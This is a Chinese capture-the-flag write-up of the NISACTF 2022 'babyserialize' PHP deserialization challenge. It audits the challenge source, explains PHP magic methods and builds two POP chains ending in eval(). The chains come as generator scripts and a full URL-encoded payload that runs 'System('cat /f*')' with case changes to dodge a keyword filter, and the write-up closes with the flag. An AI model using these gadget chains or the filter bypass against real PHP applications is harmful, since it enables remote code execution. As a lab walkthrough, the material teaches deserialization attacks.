[NISACTF 2022]babyserialize
题目来源:nssctf
题目类型:web
涉及考点:POP链
1. 先做代码审计
<?php
include "waf.php";
class NISA{
public $fun="show_me_flag";
public $txw4ever;
public function __wakeup()
{
if($this->fun=="show_me_flag"){
hint();
}
}
function __call($from,$val){
$this->fun=$val[0];
}
public function __toString()
{
echo $this->fun;
return " ";
}
public function __invoke()
{
checkcheck($this->txw4ever);
@eval($this->txw4ever);
}
}
class TianXiWei{
public $ext;
public $x;
public function __wakeup()
{
$this->ext->nisa($this->x);
}
}
class Ilovetxw{
public $huang;
public $su;
public function __call($fun1,$arg){
$this->huang->fun=$arg[0];
}
public function __toString(){
$bb = $this->su;
return $bb();
}
}
class four{
public $a="TXW4EVER";
private $fun='abc';
public function __set($name, $value)
{
$this->$name=$value;
if ($this->fun = "sixsixsix"){
strtolower($this->a);
}
}
}
if(isset($_GET['ser'])){
@unserialize($_GET['ser']);
}else{
highlight_file(__FILE__);
}
//func checkcheck($data){
// if(preg_match(......)){
// die(something wrong);
// }
//}
//function hint(){
// echo ".......";
// die();
//}
?>
有关PHP反序列化和POP链的知识点详见:[NISACTF 2022]popchains
这里放一下用得上的魔术方法:
| 名称 | 触发条件 |
|---|---|
| __wakeup() | 执行unserialize()时,先会调用这个函数 |
| __call() | 在对象上下文中调用不可访问的方法时触发 |
| __set() | 对私有成员属性进行设置值时自动触发 |
| __toString() | __toString() |
| __invoke() | 当尝试将对象调用为函数时触发 |
- NISA类
没有什么困难的,这里只对eval函数做介绍:
eval()函数:将字符串计算为 PHP 代码。该字符串必须是有效的 PHP 代码,并且必须以分号结尾。
后面没有什么特别的了,我们直接进入下一步
2. 构造payload
- 先找终点反推,我们看到在
NISA::__invoke()中存在eval,可以考虑在此插入system命令 - 其次考虑如何触发
NISA::__invoke():在Ilovetxw::__toString()中,可以将$bb构造为一个NISA对象 - 再考虑如何触发
Ilovetxw::__toString():在four::__set()中,将$a构造为一个Ilovetxw对象 - 再触发
four::__set():在Ilovetxw::__call()中,将$huang构造成four对象,通过$this->huang->fun=$arg[0];对私有属性$fun进行设置值,从而触发 - 最后是触发
Ilovetxw::__call():在TianXiWei::__wakeup()中,构造$ext为Ilovetxw对象
综上,构造出的POP链如下:
TianXiWei::__wakeup() -> Ilovetxw::__call() -> four::__set() -> Ilovetxw::__toString() -> NISA::__invoke()
构造payload如下:
<?php
class NISA{
public $fun;
public $txw4ever;
}
class TianXiWei{
public $ext;
public $x;
}
class Ilovetxw{
public $huang;
public $su;
}
class four{
public $a;
private $fun;
}
$e = new NISA();
$e -> txw4ever = "System('cat /f*');";
$d = new Ilovetxw();
$d -> su = $e;
$c = new four();
$c -> a = $d;
$b = new Ilovetxw();
$b -> huang = $c;
$a = new TianXiWei();
$a -> ext = $b;
echo urlencode(serialize($a));
?>
这里system被过滤了,用大小写做绕过
- 这题还可以用更短的POP链如下:
//在NISA::__wakeup()中做弱比较时,即可触发Ilovetxw::__toString()
//即POP链为:NISA::__wakeup() -> Ilovetxw::__toString() -> NISA::__invoke()
//因此payload构造如下:
class NISA{
public $txw4ever='System("cat /f*");';
}
class Ilovetxw{
}
$a = new NISA();
$a->fun = new Ilovetxw();
$a->fun->su = $a;
echo urlencode(serialize($a));
用第一个POP链得到的payload如下:
/?ser=O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BN%3Bs%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3BN%3Bs%3A8%3A%22txw4ever%22%3Bs%3A18%3A%22System%28%27cat+%2Ff%2A%27%29%3B%22%3B%7D%7Ds%3A9%3A%22%00four%00fun%22%3BN%3B%7Ds%3A2%3A%22su%22%3BN%3B%7Ds%3A1%3A%22x%22%3BN%3B%7D
最终得到flag:
NSSCTF{dbbd2020-013f-488f-89eb-46205c16bea5}
日期:2023.9.22
作者:y0Zero